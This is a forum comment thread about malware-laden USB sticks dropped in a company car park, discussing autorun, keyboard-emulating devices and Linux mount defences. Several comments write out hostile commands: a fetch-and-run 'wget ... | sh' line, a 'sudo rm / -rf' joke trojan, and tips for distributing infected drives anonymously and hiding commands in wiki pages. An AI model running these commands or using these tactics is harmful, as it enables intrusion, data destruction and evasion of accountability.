Most of the corporates and large institutional organisations I've done IT support for have USB ports and CD drives locked down. Techs can use USB sticks to install drivers etc. on specific machines but they're specialised devices, hardware encrypted and password-protected and the only type of external data device the OS installed on the user machines will accept -- sticking a commodity USB stick into a network-connected PC will do nothing except generate a log entry and flag up an alarm if the security policy requires it. Talking to the user about their unsanitary habits was carried out by someone higher grade than me, thankfully.

Actually if the criminals are smart

[rolfwind]

So next time, don't expect to find someone's dirty pictures on a USB stick you just found...

Actually, that's exactly what industrial spies should put on there if they were smart.

Re:Actually if the criminals are smart

[antifoidulus]

And the dumb ones write "naked cowboy Neal pics!!!" on the drive.

Re:why would you run something from it?

[petermgreen]

There are a few factors

1: the dominant operating system has blurred the line between running executables and opening data files. Then they went even furher and introduced autorun to make users live's easier. They have tried to put theese genies back in the bottle but it's difficult to do without introducing a load of pain for users.
2: Even if the OS doesn't have the above problem a USB stick could be put together that enumerated as a keyboard as well as a mass storage device, it could then do pretty much anything the user can do (though it has to do it blind).
2: the natural assumption when finding a USB stick in the company parking lot is that a co-worker dropped it. Therefore the natural thing to do is to try and determine who owns it so it can be returned to it's rightful owner. Deternining who owns it generally requires looking at the contents

Linux Live CD

I would use a Linux live cd... No real threat of infection since it would probably target windows anyway. For added security, unplug the power to the hard drives.

Re:Linux Live CD

[PPH]

You mean boot sector virus, right?

You don't boot from the 'found' drive. Or run anything you find on it, automatically or otherwise.

Re:Linux Live CD

[fa2k]

No, a BIOS virus is a concern. Software can flash the BIOS (there are windows UIs for it). It's also possible to flash the firmware of graphics cards, and possibly other hardware.

Re:Linux Live CD

[PPH]

Well, with Windows, anything is possible (they'll twist this as an advertising slogan, no doubt).

I don't know why people use Windows from an admin account (or if that would even help). But if I don't view my found porn USB sticks as root on Linux, I can' screw up.

Re:why would you run something from it?

[Eyeball97]

I ran one through the driver once

 
I say old chap, that's a bit rough, what? I hope you paid his medical expenses and gave him a shilling bonus after that experiment. Toodle pip...

Old trick.

[Caerdwyn]

This is a time-honored way of targeting a particular company. It sounds expensive, but if your motivation is commercial or governmental *coughcoughstux* it's extremely cheap compared to the alternatives (bribery, breaking-and-entering, rubber-hose cryptography). It's also a great way of finding out whether your own organization is aware of malware trouble; this technique is commonly used as part of security audits performed by companies hired to find out how good your company really is.

A company I worked for a few years ago hired a security auditing firm to check up on ourselves (only a few people were told, and we were told to keep quiet to ensure that our day-to-day practices were tested, not our "crap, someone's checking!" performance). They were unable to penetrate the network from the outside (including wirelessly) or socially engineer their way past reception or weasel out a password, but they got in via the USB-stick-in-the-parking-lot method. They told us afterwards that this is an extremely effective technique, as primate curiosity is almost unstoppable.

Re:Old trick.

[Zadaz]

Older than that. Well before USB thumb drives I was contracting at [Large Government Contractor You've Heard Of]. One day someone was outside on the street giving away CDs with free software on them. They were nice and pro, color cardboard sleeves shrink-wrapped. On the CDs were a bunch of shareware and just as many viruses.

I didn't really mind. for three full days I got paid to sit around and wait for the admins to fumigate the network.

The exact same thing happened less than a year later.

Re:Old trick.

[wvmarle]

I wonder whether the specific attack discussed here was successful.

As in: did the IT department find any other infected sticks (just one could be just as well an accidentally lost stick that happened to carry a virus), and did they find the malware on any of their company computers?

Re:Old trick.

[Reziac]

Older than that. Used to be "free floppies" occasionally with bonus malware.

Now get off my lawn!

Re:why would you run something from it?

[CohibaVancouver]

This, of course, is how Obama got elected.

Alright, I'll bite you Anonymous Coward. Would you rather have had McCain / Palin?

lol stuxnet lite

[Alex+Belits]

Idiots. Both of them.

Personal Story

[schklerg]

So a coworker found a usb key in the parking lot and wisely didn't plug it in. Instead he asked me to check it out before he did. So dutifully I fired up my live CD, plugged it in and quickly saw it belonged to a coworker. But which one in a company of 300+? Well, that was actually pretty easy to figure out, since there was a nice folder with pictures of himself naked in a mirror. Many of them. All alone. So I gave the guy the USB key, told him what I'd seen, washed my hands (and disinfected my cubicle) and was sooooo glad when the photographer took a different job.
So there may be a virus, or maybe just a lonely coworker.

Re:Personal Story

[phantomfive]

Many of them. All alone.

You looked at them all to 'make sure,' huh?

Re:Personal Story

[fa2k]

Yeah, that's why he had to clean the cubicle afterwards

Re:Personal Story

[schklerg]

I could explain things with thumbnail view, but thanks for the ridicule.

Re:Personal Story

[phantomfive]

Always happy to oblige. And no one actually cares if you had to look at them or not anyway.

Re:why would you run something from it?

Even better, it can show up as an unknown device, a keyboard, and a mass storage device. On the mass storage device you have a fake device driver for the unknown device signed by one of the many zero-day signing exploits available on Windows, you use the fake keyboard to auto-accept the driver installation, and BAM, you have full kernel access to the system.

Contest

[chrismcb]

Wouldn't it be more productive to give them away? As in brand them with the name of a product, and literally give them away at a place where they employees visit. I think someone would be much more likely to use a USB given to them at a "legitimate" event, than one found on the ground.

Re:Contest

[Jeremi]

Wouldn't it be more productive to give them away? [...] I think someone would be much more likely to use a USB given to them at a "legitimate" event, than one found on the ground.

I think you're right... but the downside would be that it would be much easier for the victims to track the infection back to its source that way.

Re:Contest

[Compaqt]

Get someone to hand out the drives for you, for $100 for two hours work.

People coming into the event think that he/she is associated with the event.

Afterwards, no one knows who it was who was passing out drives.

(It's the old "look like you belong" trick. Put on a service uniform--janitor, phone tech, whatever--and no one will stop you.)

Re:Contest

[Overzeetop]

Depends on if you actually want information, or if there are catalogs on the drive.

Heck, since just plugging in the drive causes the infection (if the machine is set to autorun), just putting it in to format it and use as a cheap sneakernet would infect the machine.

Re:Contest

[Jeremi]

(It's the old "look like you belong" trick. Put on a service uniform--janitor, phone tech, whatever--and no one will stop you.)

I'm not saying it couldn't work, just that it's more risky. Nobody will stop you, but your face (or that of the guy you hired) will be in all the convention security footage afterwards, once the victim realizes where the virus came from and asks the convention people about it. Scattering USB sticks in public places, on the other hand, is less likely to compromise your anonymity (well maybe not in Britain).

Re:Contest

[Compaqt]

Right on the security cameras.

But it won't be you.

It'll be some guy you got off of Craigs List that you paid in cash and who doesn't remember your face, and you told him you were "with the convention" and he believed you.

If you can organize it, you have the chance of much more probable hits (wide coverage--the USB drives get in to the hands possibly everybody at the company or everybody important).

Re:Contest

[Jeremi]

It'll be some guy you got off of Craigs List that you paid in cash and who doesn't remember your face, and you told him you were "with the convention" and he believed you.

Well, you hope he won't remember your face. If you're unlucky, he'll describe to the police what you look like, what kind of car you drove to the meeting, etc.

FIXED Re:Cool, free thumb drive!

[davidwr]

Don't forget to AVOID USING "-t vfat" as an option to mkfs, or else you MAY be able to use it SOMEWHERE BESIDES Linux.

There, fixed that for you

Re:FIXED Re:Cool, free thumb drive!

[mark-t]

If one has absolutely no intention on using the USB stick anywhere but on a Linux system sure... generally, however, I find that individual USB sticks get used on many different devices, and it's often ideal for it to be usable from any OS.

Re:FIXED Re:Cool, free thumb drive!

[xaxa]

If you wish to avoid FAT (patents, etc) then use UDF instead.

mkudffs --media-type=hd --blocksize=512 /dev/sdx (NB: no partitions, format the whole device).

I haven't tried this, I hardly ever use USB sticks.

Re:FIXED Re:Cool, free thumb drive!

[slashping]

FAT is also a better file system for flash drives, because the flash firmware is optimized for it. For that reason, it's also best not to repartition or reformat a flash drive with different FAT parameters.

Linux virus

[DrYak]

If you think Linux has a magical immunity you might want to read how to write a Linux virus in 5 easy steps which shows with just a little social engineering its really not hard to target Linux just as the malware writers target Windows and OSX now.

From the article you mention:

A step that could be taken by the Gnome and KDE developers: Require launchers to have execute permissions. A saved attachment won't have those. Therefore, even though a syntactically correct and properly named launcher was dropped on the desktop a user can't just click on it and start it if the execute bit is not set.

Done. Modern versions of KDE need launcher to have execute permission. That hole is patched.

And nobody pretends that Linux has some magically imunity to viruses. As a Unix-like OS it just follows a few key principles :
- don't blindly execute everything. require executable to be explicitely marked as such (thus any shit downloaded from the web or from e-mail won't automatically be launchable).
- don't run constantly as root. thus the amount of harm that a program can do is limited to the access rights of a user. (While this still makes it possible to send spam, mine the data of the user, and modify the user profile, at least it prevents further deeper compromising of the running system).
That doesn't magically solve all malware problems in the universe. But at least it makes the life of malware writer a little bit more complicated. And the 5-step virus relies on a work-around of the first rule. Which has been since then corrected.

Back then, this no-brainer principles were NOT followed by Windows XP, making it even easier to write worms spreading over e-mail. Thankfully, since then Vista has arrived and has brought UAC dialogs in these situations (now how much dialogs can help security problems when the users are used to "okay" click on everything, that remains to be seen).

Or did you think android runs on Windows?

Android is a completely different beast and instead of unix-like userland it uses it's very own userland (a Java-like system).
Though it too doesn't allow execution of arbitrary e-mail attachment too. It's not impossible to write android malware, even malware that finds a way to look legitimate to android's capability system.

But at least the scenario "Here are some pics of hot lesbian teens! Click on the attachment to view them!" doesn't work on modern OSes. Except windows (and that's until WinXP, starting from Vista, you get an UAC dialog telling you that you run an executable from an untrusted source - now how many idiots will click on "okay" anyway is a different story).

Re:Linux virus

In case of a rogue USB stick, the virus wouldn't be downloaded. It would already be on a fs with execute bit set.

I find it odd: the amount of mental gymnastics you go through to prove linux to be better.

Re:Linux virus

[ais523]

Same with Gnome, btw; a launcher without execute permission will get opened in a text editor if you double-click on it.

Re:Linux virus

[colinrichardday]

That still doesn't help the attacker if the filesystem is set noexec.

mount -o noexec /dev/usb /media/usb_stick

I don't know if you can set noexec in fat or ntfs, but then would the executable run in such a case?

Also, how would you execute the file?

Re:Linux virus

[Dr_Barnowl]

You can set noexec for FAT and NTFS, the default is that everything is +x though.

There are executable types that will run on Linux like Python scripts, shell scripts, etc. But it's hard to think of one that will work out of the box on both Windows and Linux ; .NET executables might be a candidate, if your system has Mono installed. And Wine will permit some Windows malware to run.

Re:Linux virus

[Compaqt]

>mount -o noexec /dev/usb /media/usb_stick

How many people are going to do that?

Most any distribution will automount anything you plug in. You never get the chance to run your mount command.

You're talking about what you would do. Everybody else is talking about what the average person would do.

By the way, what are you running--a server distro?

Even if we limit ourselves to a Linux shop (say one of the ones which have been covered by Slashdot, Munich city government or whatever), the average user does not have USB autodetection turned off. How else do their USB keyboards work?

Re:Linux virus

[drawfour]

Looks like I'm safe!

C:\Users\drawfour>wget houghi.org/trojan && sh trojan
'wget' is not recognized as an internal or external command,
operable program or batch file.

Re:Linux virus

[ozmanjusri]

How many people are going to do that?

Everybody *

Desktop distributions use pmount for USB hotplugging. From the man page:

OPTIONS
...

  -e, --exec
                            Mount the device with the exec option. Default is noexec.

http://www.linuxcertif.com/man/1/pmount/

By the way, what are you running--a server distro?

Most server distros don't automount (no desktop). You can get them to automount USB drives to a specified location (ie, for a media server) but need to install and enable the automount package and configure it, much like colinrichardday's suggestion.

* Rounded up for clarity.

Re:Linux virus

[Anonymuous+Coward]

Come on, it would be much easier on Linux to exploit bugs in the filesystem code - I now from experience that the code is not that hardened on that side: even accidental corruption of the fs may easily crash the system.

Why bother with executable files and such?

I don't know of any Unix that regards file system metadata as an attack vector -- it's assumed that the hardware (including the physical support of any non-network fs) is under the complete control of the user ;-)

Re:Linux virus

[bejiitas_wrath]

On Ubuntu 11.04.

flynn@ubuntu:~/Desktop$ sh ./trojan
sudo rm / -rf
read: 3: Illegal option -s

Almost had ya! ;-)
flynn@ubuntu:~/Desktop$

Re:Linux virus

[ozmanjusri]

Most modern distributions use HAL, not pmount

They use both.

pmount ("policy mount") is a wrapper around the standard mount program which permits normal users to mount removable devices without a matching /etc/fstab entry.

pmount-hal extends pmount by making it work together with hal (Hardware Abstration Layer). pmount-hal will ask hal about values for certain mount flags (like noatime and async) and the prefered mount point name and pass it to pmount, thus respecting the configured device storage policy.

Re:Linux virus

[Feyshtey]

If your goal is to exfiltrate data you dont want to crash the system. You want as little evidence of your presence as possible. You'd probably want to propogate your code to that network wherever possible as well. You would have to execute in order to accomplish that.

Re:Linux virus

[marcosdumay]

Scripts will "run" only if you extend the meaning of that word to include running an interpreter and passing them as argument. They will just run at the normal way (just executing them) if they are chmod +x. In a CLI both are completely different things.

I don't know how the GUIs treat clicking at them (hey, I don't remember ever trying it). The sane thing to do would be to run them if they have the x bit set, otherwise edit them.

Re:Linux virus

[Anonymuous+Coward]

Many crash-causing bugs are readily exploitable for code execution.

He Didn't Have his Home Address on His Resume?

[Greyfox]

Didn't occur to you to go to his house, pick the locks, and leave the drive on his night stand? Because that would have been AWESOME!

Mandate (policy) use of secured USB keys

[rsborg]

Any security-minded organization would indoctrinate their employees, and set policy (either via OS security and/or SOP) to use only secured USB keys, which are provided. This should be a no-brainer, and shouldn't cost a significant amount.

This kind of policy limit the scope of these kind of attacks, as well as helps to prevent inadvertent info-leaks like when workers lose their wallet/backpack. By preventing stupidity and bad luck you greatly improve the company security.

Simple yet effective

[zixxt]

Social Engineering at its finest and most simplest. Much more effective getting your payload unto a system using this method then say then using a dancing baby gif.

It might not be a drive

[Chuck+Chunder]

The trouble with USB is that you don't know. Let's say you plug in that "thumb drive". Perhaps it turns out to be a "keyboard" that issues whatever the shortcut is for executing a command and sends something like:

wget -q -O - http://naughty.com/ | sh

All sorts of things could happen when you plug in a USB stick. Perhaps not too much of a worry in practice for Joe Schmo as doing it effectively would probably require a level of sophistication that would make it not worth while for a vague target but Linux does not magically make USB sticks safe.

Ah, Autorun...

[humanrev]

The autorun feature of Windows (mainly XP and to a much lesser extend Vista/7) is a textbook example of where trading convenience for security can turn out to be a VERY BAD IDEA.

Autorun functionality pisses me off anyway. I always turn that shit off mainly because yes, if I put in a DVD or a USB flash it's likely I'm going to be wanting to use it soon, but since Autorun is going to invariable pop up some Explorer window or DVD application all of a sudden once the media has been analysed, that very action of a new window popping up without my direct instantiation of it is damn annoying.

Saving the couple of clicks to perform the same effect of whatever Autorun does is really, really not worth the mess we've gotten ourselves into (and still do).

Re:Ah, Autorun...

[humanrev]

Fuck, that should have read "trading security for convenience". As in, you give up security in exchange for obtaining convenience.

Oh now my whole comment is ruined. I can't bear to read the responses from strangers I'll never meet in the flesh, it will be too much to bear!

Re:Ah, Autorun...

[Megane]

You're going to feel real stupid when it's got something a lot more complicated than a simple mass-storage volume with autorun crap on it. A USB device can pretend to be a keyboard, among other things. Hopefully there are no bugs in the USB kernel stuff... buffer overflows / bad data in USB configuration data is one of the early ways the PS3 was broken. If you try it first on an ARM CPU embedded Linux board that doesn't use HID devices, that's probably the safest way to start.

Autorun functionality pisses me off anyway.

I've got to agree with you there. There's a registry key change to turn it off completely. I did that to my XP computer at work. It's a bit annoying that I don't even get an explorer window to it and have to go through My Computer, but it's better than having that stupid "what do you want to do with THIS one?" dialog in my face all the time, which takes almost as long anyhow to recognize which option is which before I click.

Re:why would you run something from it?

[geminidomino]

Quid quid latine dictum sit, altum viditur

Speculation vs Investigation

The 'cyber criminals planted the usb sticks in an attempt to steal data'... stuff doesn't come from investigation, it comes from speculation. It could simply have been an infected USB stick an employee threw away or dropped.

DSM is really a boring chemicals business, employing tens of thousands of people. The chances of spyware getting past anti virus software and onto the right persons computer is pretty damn slim.

So it looks more like projection to me. There's a lot of talk about cybercriminals as part of the 'cyberwar' budget requests. This was a lost USB key infected. IT dept projects the cyberwar onto their company and assumes it was a cyberattack and not some piece of crapware. Cyberwar lobby grabs the story and pumps it up for their own agenda.

Re:Speculation vs Investigation

[dutchwhizzman]

No, it's investigation. It's not just one stick, it were multiple sticks with the exact same contents on the parking lot at the same time. Yes, that sounds as clumsy as it is.

RAM stick incident

[SlashDev]

I found a RAM stick once in a parking lot, I plugged it in and found nothing, or so I thought, a directory listing was empty and a anti-virus scan returned a clean bill of health. A few days later my friend told me that he was receiving emails from me. After investigation it was determined that a Linux on windows was running, with a SMTP server and a mail client was sending many emails. Is that possible? I asked about the reason for the SMTP server, I was told it was in case my ISP was blocking or throttling SMTP traffic through their server.

Re:RAM stick incident

[GameboyRMH]

It's possible (I assume you meant "flash drive" vs "ram stick"). The "Linux on Windows" used was probably a customized Cygwin instance and it's understandable that an AV tool wouldn't have picked it up. I bet the drive's autorun ran a script that copied the Cygwin instance to your hard drive and made a startup entry for it. The Cygwin instance probably also contained scripts that checked local mail clients for mail accounts it could use.

Lucky for you it was just a spammer botnet client, it could have been much worse.

Re:why would you run something from it?

[CohibaVancouver]

83-percent-of-doctors-have-considered-quitting-over-obamacare

Blah blah blah. The doctors said the same thing in Canada fifty years ago when universal health care began to be implemented. Today Canuck docs claim they'll quit if health care is changed in Canada. How many American docs quit when medicare was put in place?

Re:why would you run something from it?

[CohibaVancouver]

Palin believes in the Constitution

How is this possible when she barely understands how the Supreme Court of the United States works? The Supreme Court defines the constitution of your nation.

Re:How stupid do you have to be?

[AHuxley]

Depends if you feel that your carpark might on average have a rep or legal or sales person drop a usb stick.
Better to pick it up, have it looked at than someone take it home or for a stranger to find it.

Just because you issue a warning...

[nighthawk243]

Just because you issue a warning doesn't mean your end users will heed it. I've learned that all too well in regard to WhitePages. We tell our employees to not use it, yet they do so anyways. Then they bitch when we're replacing their systems due to a rogue AV suite. So even if IT issues a general warning to not plug in the drive... some brain dead end user will do so anyways. It only takes one.

Re:why would you run something from it?

[colinrichardday]

The Daily Caller is citing this

http://www.doctorsandpatients.org/component/content/article/81

They sent out 16,227 surveys and received 699 responses for a response rate of 4.3%. Ooh, I'm scared.

Should be closed anyway

[sociocapitalist]

The company should have disabled USB ports on all company computers anyway. Inconvenient, yes, but necessary in this day and age.

Doesn't address the newly popular (due to continuing stupid expense reductions) of BYOD where of course USB ports will remain open, but as BYOD is a security nightmare anyway...

Re:Should be closed anyway

[Overzeetop]

You would be surprised how frequently sneakernet is used in many organizations, especially inter-departmentally, or with outside consultants. It doesn't help that internet connections are still relatively slow, generic cloud access is blocked, and FTP access is often locked down so drastically (or so mysterious to most non-technical users) as to be a time consuming process. Having to put in a request for someone in the IT department can take a day or two, but if you are under a deadline, a 48 hour turn around to communicate with a consultant is a long time.

The biggest challenge with creating effective security is providing the manpower to work around all of the technological safeguards that keep the network safe.

Re:Should be closed anyway

[Joe_Dragon]

well now days ps/2 ports and keyboards and mouses are not that easy as they used to be to find on computers.

Re:Should be closed anyway

[sociocapitalist]

I know that it is used but that doesn't mean that it should be used.

The solution isn't to allow USB usage, but to find a secure way to transfer files. FTP should be migrated to SCP with whatever level of authentication and virus/trojan/malware checking is required by the organization in question.

Security usually comes with inconvenience.

olds

[Tom]

This is so old and has happened so many times before that some organisations have had time to develop, test and deploy so-called "data gateways" - machines that you can put your USB sticks, DVDs and other media into, that will scan them for infection and safely transfer the files you select to your network share.

Re:why would you run something from it?

[Hognoxious]

Since ./ is a liberal cesspool

The contents of your current working directory are of no interest to me.

snail mail attack

[mlush]

A bulk purchase of low capacity but nice looking keydrives could easily be less than $1 a pop... for that sort of money I could see a mass (snail)mailing of malware being quite feasible...

Targeted advertising data could be used to select young, affluent, non-techical types, perhaps package the drive as a free trial version of a music/movie download service even have a slick looking website with the 'viewing' software there as a free download.

"Failed?"

[Rogerborg]

I wonder how many time they succeeded silently before they got busted and stopped because (nobody laugh) a "warning" was issued.

And the Security Kabuki goes on.

Different context

[DrYak]

I find it odd: the amount of mental gymnastics you go through to prove linux to be better.

We're not speaking about malware-on-a-stick as reported by TFA.
I'm just answering the current thread of discussion, in which the conversation has drifted toward the usual debate of Unix-like OSes vs. Windows regarding design and security.
(in short: all modern (=anything dating back from Unix) OSes (except Windows) are reputed to be slightly more secure due to their design: namely they don't run thing which aren't tagged as being runnable in the first place, they don't run with admin privilege. This doesn't solve all problems, but at least makes these systems less likely to be target of the "Click on attachment to see nude pictures!" type of malware.
Parent poster pointed back to a 3 year old article trying to prove that it's possible to build such type of malware.
I did just explain that this article is built around an oversight in desktop environment which was fixed since then in the affect systems, so the initial claim, "sane OS design = less susceptible to clickable malware in attachment" still applies)

In short, in the last few post we were speaking about a different type of malware than the one of TFA.

In case of a rogue USB stick, the virus wouldn't be downloaded. It would already be on a fs with execute bit set.

Well, for that to work, it would require that the FS *has* an execute bit to set.

The usual filesystem found on USB stick (FAT) doesn't have one. Nor does the other typical choices found on amovible media (exFAT, NTFS, UDF).
And I have to check, but it's quite possible that hot plugged device, aren't mounted with the "exec" attribute with but "noexec" attribute. (My distro does indeed do so). Thus for filesystem which aren't declared in the fstab, they aren't trusted enough by default to run anything.

So, in order to have a working USB stick as a malware carrier, one need:
- to format with an unusual format (ext, btrfs, etc. Or using a layer above FAT & UDF like TRANS.TBL)
- set the execute (and maybe the suid or dev, might be useful depending on what they want to snoop/steal) bits on the file system
- either hope that the hot-plug service isn't configured to use the "noexec,nosuid,nodev" combo by default.
- or find a way around that:
-- like store the hack inside a .ZIP file (or more likely a .tar file, to get the mode-bits packed with it)
-- along with instruction not to double click on it (which will open the TAR with the desktop environment VFS plugin - no executable at all here), but instead drag-drop the content of the TAR to your home before opening it (where the execute bit will be honored*)
-- hope that the guy will open the pictures by clicking on them (and won't instead use some "slide-show" command right-clicking the directory)

At that point of complexity, it's easier to go the "Smartphone malware" route, and play by the Linux book:
- design a closed source application.
- with some interesting feature (MP3 Youtube downloader!!!)
- hide your malware payload inside the package
- submit your package to some closed source repository which doesn't check that closely the details of submitted applications.
- if the repository is popular enough, people will start downloading the software and installing it.
Now all the dirty complicated parts (making sure that the correct stuff is marked as executable, etc.) is automatically handled by the package manager (as it should on any modern linux distro).
"all" you need is "just" some social engineering:
- to convince the repository manager to include your package (easier with smaller less known repositories).
- to convince the end user to notice your 3rd party application, add the repository and install your malware. (easier with big known 3rd party repositories).

*: That's the only situation where the security model of Windows (version >= Vista) is slightly

Re:Different context

[marcosdumay]

No. On that single situation Windows is still no better than Linux.

If you copy a file from a noexec mountpoint in Linux it will come with the x bit cleared, despite whatever value it had originaly (that you'll only be able to discover if you remount it as exec). It will only be permited to run if you mark it +x. On Windows it will only be permited to run if you click yes on a dialog. Linux is no worse.

Now, if the file comes inside a container that knows about the +x, and you copy it to a exec mountpoint before extracting, the bit will be preserved. On Windows, if the file comes inside a container, whatever it is, and you extract it, Windows will trust the file. Again, Linux is no worse.

Re:dude

[MichaelSmith]

Wow he went off the deep end right at the end there. Hope he is okay.

Slip it in a wiki

[DrYak]

- Set-up a wiki somewhere.
- Create a page with a tasty title
(How to rip lesbian porn videos from flash powered site!!!!)
- Hide command in a big wall of commands that have to be copy-pasted to a shell.
- With some clever page formatting, make so that the line seems invisible when displayed in a web-browser, but still gets copied when the big wall of commands is selected, copied and pasted into a shell. (You know like this old trick where the user is asked to copy-past a password into a web form. But the input field is actually ta "file input" field in the web form, the password is actually a much longer string (the full path of an important file to steal) but only a few letter are visible the rest is invisible due to weird formatting, and the form is autosubmitted by javascript).

Clueless users will execute your script en mass.

Re:Slip it in a wiki

[hairyfeet]

What is amazing is you read some of the other posters, who were so quick to mod me down and go "poo poo, Linux is virus free, poo poo" it ALL comes down to "Magical Thinking", the same crap that those selling security junk have used for years. Its the same old "With product X you are always safe and immune!" which anybody with two functioning brain cells ought to be able to see through, but apparently not here. Nice to see at least one person gets it.

Look magical thinkers, it is VERY simple, okay? EVERY SINGLE OS is an extremely complex pile of code. it has to support at least tens of thousands of pieces of hardware, multitasking, resource management, hell the kernel is how many million lines now? And that is before you even account for all the third party code running on top. I bet you could ask Linus Torvalds himself what happens when program Foo gets called and even HE won't know every single interaction, its just too complex.

So magical thinking simply doesn't work. What kernel is Android running while its getting malware up the butt? That would be Linux. What about Are there unpatched security holes in Linux? Why yes there are which kinda blows a giant hole in the magical thinking. BTW if you'd like a little more food for thought, what OS was 3 of the 4 CAs running that were compromised? take a look and see. Maybe they just had bad configs? Surely someone with knowledge would be safe right? Guess again and its not a fluke by any means.

In the end it doesn't matter if you are running Linux, windows, OSX, BSD, or OS/2, if you are targeted by malware writers, which is EXACTLY what happened to the corp in TFA, then they can simply target the payload to the OS and you are just as screwed, no magical thinking will save you.

Re:why would you run something from it?

[Teun]

You said it :)

Not new

[ewanm89]

1) Penetration testers have been using this attack for some time, surprisingly often it works, it only takes one clueless manager to plug it in.

2) With a little creative reengineering one does not need to rely on the system to automount and autorun the stick, instead one sticks a USB hub in there and a HID emulator and pumps out keystrokes, pretty much all operating systems will automatically initialize it as a keyboard device. Also one can hide that function until go time. let them act as ordinary memory sticks 'till then.

Re:Not new

[whitedsepdivine]

I read a study also.

50% of people will plug the usb drive into their work computer if dropped off in a work parking lot. Even if it is a secure environment, such as DOD.

90% of those people will open and executable if it has an icon and name of the the company.

Re:why would you run something from it?

[GameboyRMH]

I ran one over with my car once and it still works to this day. All I had to do was bend the connector back into shape.

Misleading title...

[cpotoso]

And I thought the anthrax scare was back... Oh, well, read on.

Simple steps

[Rambo+Tribble]

1. Don't, under any circumstances, mount it

2. Format it

3. Enjoy your new USB stick

A reader that honored the switch would be fine too

[davidwr]

If a given computer had a card-reader whose hardware or immutable firmware guaranteed read-only behavior when the lock tab was set, that would meet the r/o requirements as well, but only with respect to this particular computer and other computers with the same feature.

It would basically be the same situation floppy disks were always in: Most 1980s floppy drives enforced the read-only tab in hardware, the host computer couldn't override it. But it was possible to build or modify a floppy drive so the read-only tab was ignored.

As a customer, I would PREFER a computer where any writeable long-term-memory had a physical way of locking it into read-only mode that could not be defeated in software. This could be a jumper setting, a lock/unlock tab, a push-button, or whatever. "long-term-memory" included hard drives, writable USB/firewire/etc. devices, SATA and IDE devices, and even the computer BIOS code and that part of the BIOS data that doesn't need to change all the time (i.e. the clock and certain other status bits would not be protected from change). Those last two I would keep "read-only" 24/7 except when I was making changes.

Comment removed

[account_deleted]

Comment removed based on user account deletion

AOL used to do this!

[oldmac31310]

Except they used CDs to infect people's computers.

Gub'mint!

[DarthVain]

I got you beat. Years ago we used a build of Windows NT that didn't recognize USB ports. Security problem solved. (yes we had the ports, we just couldn't use them. I recall having to install a SCSI card just so I could use a scanner... good times.)

Of course criminals could just leave some 3.5 floppy's laying around in the parking lot... not quite the sexy draw I would bet...

I got a USB virus

[peawormsworth]

I went down to the employment office to get some assistance finding work. There I used a USB stick to record some stuff off one of their PC's. When I came home and looked at the USB on my linux box I found a . (dot) hidden directory I did not create. I searched online and found the files within were related to a PC virus. I emailed the office and told them exactly how I got the virus. A week later I went to the office again and used a different PC. I popped the USB into my linux laptop and there it was again. I went to the secretary and told them this was unacceptable and that they were propigating viruses to their clients.

I also dislike operating systems that randomly add . (dot) hidden directories to my USB. For example apple products seem to do this. I think they add files in order to improve access to the contents or add images or something. Every time I stick my USB stick into someones Mac, I have to go through the directories it made automatically to verify that it didnt insert some malicious code.